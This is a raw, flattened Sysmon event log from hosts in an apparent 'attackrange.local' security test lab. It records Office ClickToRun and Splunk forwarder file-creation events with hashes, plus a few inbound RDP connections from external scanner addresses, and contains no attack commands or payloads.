Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE02280_.WMFMD5=B4ECEBCBC2BC9A7CB19DC3D80146B849,SHA256=93018D4EFA173EBCF7969DB86E6C4E500B280EEAD21C1F9E22A67D85215E106B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066402Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE02278_.WMFMD5=4A1BEE5257CE33B07E7DCC9BD3A9E08C,SHA256=49288649BF9157711D3EA3E5DCA58BC0E053F83151181A28DC4CF48203A97436,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066401Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE02270_.WMFMD5=E39956E257EEDA5370165600557AF095,SHA256=C41EA13B2831C83F0E4BEF5F03FE3E18B5FC41880966E09B3BE67CBB0E985678,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066400Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE02267_.WMFMD5=061DD6E62097171264FEE5AE3563A9EB,SHA256=326535CC2AF71C440E15B0736E918F73179D6E7FDB18B186615B268132D706A9,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049721Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:08.738{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com61366-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049720Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:08.352{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com54505-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049719Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:08.102{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-61855-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049718Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:10.768{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B95B51A4F171492B15585101538AA3C2,SHA256=C468F53403EE6CCCCEDDDD6B70E6B0D5C9A2B3BA4D393497B9604878628B67B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049717Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:10.487{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D82126F6A2897C850A34F3546EBD441,SHA256=F7F822977A5649B78DC6DF597498A2149D3ACF85F9888240A149F1F34E80FE2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066899Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:11.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\Addons\OneDriveSetup.exeMD5=11D5E2EF5D9A0E009DF8CC61F4706982,SHA256=17A5F35C30B9D1DBB651686407DBF7D1BDCC685426581AF6796B364550E7FE70,IMPHASH=059AC5CD530DD28EAD72A380619D30D7truetrue 23542300x800000000000000066898Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:11.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\Addons\Bing.msiMD5=AF9E178233F0AA84B0082AF57B871733,SHA256=EEDDA6B099C601546148F8A47921F00961199FB3AE9319C32A726A381B66C846,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066897Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:11.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\fre\StartMenu_Win8_RTL.mp4MD5=3B2587A7EE0B3607386FD15EBBCF9E56,SHA256=A2F6010CCA01E73B1BF3FE55B71203C4D605519B757F9D11CE29179C5EB6ACD8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066896Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:11.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\fre\StartMenu_Win8.mp4MD5=89767C3BA28300FC97CBEE6D92BCE086,SHA256=CA41A1E25D44E813AFB8A02767F751100CA94D86E8F4959AF3CA2A26E549D683,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066895Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:11.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\fre\StartMenu_Win7_RTL.wmvMD5=E7FECFAAC32340D84D4DF1BDA47A072D,SHA256=0CA8633B8F2DDFA6C882D87FD9226B21270BE95786B25E7E7745325EA8418070,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066894Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:11.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\fre\StartMenu_Win7.wmvMD5=0353923129F14492A7AB21EFF185B7BF,SHA256=8D8CA972C30DDC7EA83DA749EBECAACC1FEE40592336E4AFF861F8AA48563D78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066893Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:11.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\fre\StartMenu_Win10_RTL.mp4MD5=A1C9A1D2C2FA6C62EF9D998C97015EBC,SHA256=75D8EA3A8BA110D2023AD18D6D3D1A81D80C6B81666E757370E24CF9C82EA3A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066892Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:11.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\fre\StartMenu_Win10.mp4MD5=E75D071DC0416AB3F32DE43EA7F12DCA,SHA256=E08C4F311CB6DFDB02BC75DC1F0BE305ABC5FD6C69BB6F3DA260B4803C26A594,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066891Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:11.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Wisp.thmxMD5=E31B3F90DDECD848F12E08DC125D4C4B,SHA256=D616240045DB7E9E30840138C8CAF0C554B09ED4259A6D6BDBD422B58B3846E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066890Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:11.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Slice.thmxMD5=C6BE245A2474B3CCA49248F8DE86AF9F,SHA256=1D3B0AC03AB2A9CEC89A78CACD6CE6B0B4579A3F93B86110E93218E29658047B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066889Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:11.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Retrospect.thmxMD5=126269588DEC71F54D53B563106D0500,SHA256=0C11107C6CF799125DB9352E2F3A0D2B9ED5D55CBBEAED66D79464058598D94B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066888Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:11.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Organic.thmxMD5=476CF35ED8367EB98237B6428266D6D8,SHA256=71739BEA66F1DEE0789A7675ADD098123EC0E8E45EB74D707F6412B28FCBAE81,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049722Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:11.487{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2929586665894E36C99A4CBF6ED81111,SHA256=92F6090CF4F83CE060524AC4E740609A299452336F0808DD31B648C988061CC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066940Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:12.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\Integrator.exeMD5=E6F107D6EEC45D320E5401C649303837,SHA256=59DA43A09AF9FD6EAAD6E02D5C838AF62D1DD5E01A892E380C92D70B793D1B34,IMPHASH=E8BEA05A14048595A134B0431534A6DFtruetrue 23542300x800000000000000066939Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:12.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\C2RManifest.wordmui.msi.16.en-us.xmlMD5=A50CD09371A061F3CBD6A3905EB5336B,SHA256=61C0621DFBA5BAC64F58989F9289C00DC69F43F03209D44BE38CC05F9575D85C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066938Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:12.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\C2RManifest.Word.Word.x-none.msi.16.x-none.xmlMD5=3F22D6139CB507579AE3951855EC08A4,SHA256=4530BA8841CD61854DC3C25711F654603469513319B0DA86AC421B2B7181F412,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066937Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:12.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\C2RManifest.shared.Office.x-none.msi.16.x-none.xmlMD5=B3B4C70E3A50F614623FBB19256196F2,SHA256=BAE113E14CE2303042F240B4380383E922376BAC4BDC7320231D5A5B6DCDEC22,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066936Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:12.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\C2RManifest.publishermui.msi.16.en-us.xmlMD5=AF6DD305F8ED217B15F2F027173451FD,SHA256=8A2F375662E708FC13F0B32C202DD2BAC42C3B0CDFF87C2C141188860BD86F5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066935Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:12.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xmlMD5=56D742CC4E2915B2EE4DCBD5FDABEB41,SHA256=EBB7361AB7507BC2D630E6B3922C35169A929E67F40E5B3E42483854ACB2B6ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066934Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:12.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\C2RManifest.proofing.msi.16.en-us.xmlMD5=D23CF0DA0462ECBB77509F23F26EDC57,SHA256=9FC823530FF0F81C7064FB67D0F6932AD735897A2F5479A8F1D298075B04817F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066933Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:12.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\C2RManifest.Proof.Culture.msi.16.fr-fr.xmlMD5=37CDE9AFB1540513BD564D71867021E0,SHA256=516AA640A48752BCADBD46E4F53C0560A1CB379D5366B1C9BB4D0706D1BD040F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066932Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:12.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\C2RManifest.Proof.Culture.msi.16.es-es.xmlMD5=156B3AB70B2CCE134D493104D047E6FA,SHA256=5FBA15E64D0FF7075951A8E6BF758D81D4C14FA98E6B8604D5BBC43317DA8C01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066931Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:12.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\C2RManifest.Proof.Culture.msi.16.en-us.xmlMD5=A51810907BF5E4844F244641D43F3DF1,SHA256=D27F3E564571205672B37B31C42FBC981D3370F58261163FC10564307A1E11AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066930Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:12.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\C2RManifest.PowerView.PowerView.x-none.msi.16.x-none.xmlMD5=30C651A9D85C614A6B0405E2903A3253,SHA256=CA53DE9C6E319A019AB35EA9990BB17A9AD6A506AF59DC52C44AF8362295F93F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066929Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:12.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\C2RManifest.powerpointmui.msi.16.en-us.xmlMD5=E9ED7134EBF28FEA3F7AA5691A28438A,SHA256=8FE0A353CE49D8BF91B019174A72F92C70870D8215B3AFA565A01EB041569E28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066928Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:12.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xmlMD5=B89CD3160175029F43DC15FBDEC2DA3D,SHA256=23AFFBC1998F8968824EF219614CCBA402C152CED593A494184149487349D7D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066927Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:12.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xmlMD5=5953A489F63AF66F1ADF6C8D2AD12245,SHA256=158F9F700A2D1FDAB530D54394F6903965D12FFBE67FC1A941F4C9CF2122D219,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066926Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:12.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\C2RManifest.outlookmui.msi.16.en-us.xmlMD5=E850B23CE49173A832E45B9908C04E40,SHA256=B1B27D51F1052F7C2BD5CFDBFD3F5A6623DB14EA6CF5BB9251ED7EDA592601DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066925Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:12.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xmlMD5=1610CD263D91ED15D3ED66C79E2BFF5C,SHA256=DEF663BF8B77CDA5E2A56DB6E172B4BC528F97613529012A68FCF464A3F2FE4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066924Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:12.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\C2RManifest.osmuxmui.msi.16.en-us.xmlMD5=220AE72AA2505C9276DA2056B7E34936,SHA256=AFC37BA57FAC36BA151953B67619DBBB985F58122F4EBE07F15B312B5BDF004C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066923Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:12.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xmlMD5=E52262399745FE981A7FBA69C55F09DC,SHA256=838E2CD11573DFCBB74C47621B30C5A7B62B2A063A41282A8E117B7B8FD5EBBC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066922Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:12.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\C2RManifest.osmmui.msi.16.en-us.xmlMD5=3EF69B2C0F15E6B97FCA1141BC9BEB9A,SHA256=F3E25CF6F3FDD2017B76701290BA9599384DD2084111545F6DA078502CAE29CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066921Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:12.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xmlMD5=C37E4631CAC9C6FA2115119130D34FEE,SHA256=CB1E437488402DB0A3E03CA37DD6EF28D4FAC99030CAA31A17951D06EDE7D4DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066920Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:12.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\C2RManifest.onenotemui.msi.16.en-us.xmlMD5=0F78D8114FC3075610AE68CEAB0027A2,SHA256=129BAF8BA6A8B8A21326BAAFB47396D88CF4A376B2E1A1E9FB0AC2F5D4836380,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066919Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:12.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xmlMD5=0EC96191242978A5F4C3A7C2742F9C76,SHA256=74C0ECEB7424F840DBD18DC5A3D62C86F441B8BE7EFD8E1DB59994E9C0BDD507,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066918Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:12.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\C2RManifest.officemuiset.msi.16.en-us.xmlMD5=576AEFA0D5CEF530C59FF90625D60E25,SHA256=F5B39BD24EFBF27831061A34D1A78CEA8F0073BFCCADE786129495F17CF2F112,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066917Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:12.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\C2RManifest.officemui.msi.16.en-us.xmlMD5=F822B877A56DBBBFFE5779975051C280,SHA256=FFDEE66B7C03A9DF42697F5B20AE393B5FFFAADFA60416657EF97AA79F6E74BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066916Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:12.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 